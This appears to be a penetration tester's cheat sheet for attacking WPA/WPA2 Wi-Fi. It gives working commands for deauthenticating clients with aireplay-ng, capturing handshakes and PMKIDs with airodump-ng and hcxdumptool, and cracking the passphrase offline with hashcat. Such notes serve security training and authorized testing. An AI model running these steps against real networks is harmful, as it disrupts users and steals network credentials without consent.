Wireless
Tools
Aircrack - Main tool for recon and grabbing handshakes
Hcxdumptool - Main tool for obtaining PMKID and EAPOL M1M2M3 or EAPOL M1M2M3M4 auth
Hcxtools - Used to converting .cap, .pcap, and .pcapng files into a hashcat readable format.
Hashcat - For cracking hashes
Handshake/PMKID
Aircrack
Verify the interface wlan0
is up and ready
iwconfig
Put interface into monitor mode
sudo airmon-ng start wlan0
Start Scanning and performing recon, Taking note of: The channel #. This is needed if there is only one AP on the single channel. If there are multiple under different channel, this is not needed. The AUTH section. PSK(Pre-shared key) means we can obtain a handshake for offline cracking. MGT means it is configured for WPA-Enterprise The Stations below to see if any clients are connected to our target. This may not 100% show all connected clients.
sudo airodump-ng wlan0mon
*For 5GHz networks
sudo airodump-ng wlan1mon -b a
*For all networks (2.5GHz and 5GHz) - Note this can take longer as it sniffs multiple bands.
sudo airodump-ng wlan1mon -b abg
Focus on Targe ESSID(s) and save to a file (be sure to add the band with -b
if sniffing on on 5GHz or both)
sudo airodump-ng wlan0mon -c CH# --essid "SSID" -w outfile
Obtain handshake - either wait for someone to connet to the AP from their device OR force a deauth. Using a second terminal window/tab: To deauth anything from the network
sudo aireplay-ng -0 10 -a BSSID wlan0mon
If we choose a client to deauth it will be the same but with the client MAC(station)
sudo aireplay-ng -0 10 -a BSSID -c STATION wlan0mon
We can see if a Handshake obtained by checking the top right of our airodump screen
Once we have our handshake, we can stop airodump with ctrl+c
.
HCXDumptool
This may depends on which version you have installed. Eg. v6.2.9 has a different interface than v6.3.0+. I'll be going with the most up to date (currently v.6.3.5)
This attack is not guaranteed!!. Not all access points(APs) are vulnerable to the PMKID attack, BUT this can still obtain us EAPOL M1M2M3 or EAPOL M1M2M3M4 auths.
Legend
R = + AP display : AP is in TX range or under attack
1 = + AP display : got EAPOL M1 (CHALLENGE)
3 = + AP display : got EAPOL M1M2M3 or EAPOL M1M2M3M4 (AUTHORIZATION) - hashcat / JtR can work on
P = + AP display : got PMKID - hashcat / JtR can work on
S = + AP display : AUTHENTICATION KEY MANAGEMENT PSK
E = + CLIENT display : got EAP-START MESSAGE
2 = + CLIENT display : got EAPOL M1M2 (ROGUE CHALLENGE) - hashcat / JtR can work on
Scan for PMKID
Put interface into monitor mode
sudo airmon-ng start wlan0
Find the BSSID of our target with some recon using airodump
sudo airodump-ng wlan0mon
Once we have the BSSID, put it into a Berkeley Packet Filter (BPF) .bpf
file.
tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 BSSID -ddd > SSID.bpf
OR
hcxdumptool --bpfc="wlan addr3 BSSID" > SSID.bpf
** NOTE: We can attack multiple APs with:
tcpdump -s 65535 -y IEEE802_11_RADIO wlan addr3 BSSID or wlan addr3 BSSID2 -ddd > SSID.bpf
OR
hcxdumptool --bpfc="wlan addr3 BSSID1 or wlan addr3 BSSID2" > SSID.bpf
sudo hcxdumptool --rds=1 -F --bpf=SSID.bpf -i wlan0mon -w outfile.pcapng
After a while we may see the + under the 3 or P of our target. Both of which can be used to obain the password with hashcat. (Unable to get a PMKID in the demo environment sadly.)
When we see the + under the 3 or P of our target, stop hcxdumptool with ctrl+c
Crack it with hashcat
Convert the file to a hashcat format. The output will look the same regardless of which file extensiton it is.
.cap file converstion to Hashcat format.
sudo hcxpcapngtool -o SSIDHash outfile.cap
.pcapng file conversion to hashcat format
sudo hcxpcapngtool -o SSIDHash outfile.pcapng
Use hashcat with mode 22000 and a wordlist. Try different wordlists and rules.
sudo hashcat -m 22000 SSIDHash wordlist
We can also run the above command with --show
to show the password.
sudo hashcat -m 22000 SSIDHash wordlist --show
Captive Portals
COMING SOON
Last updated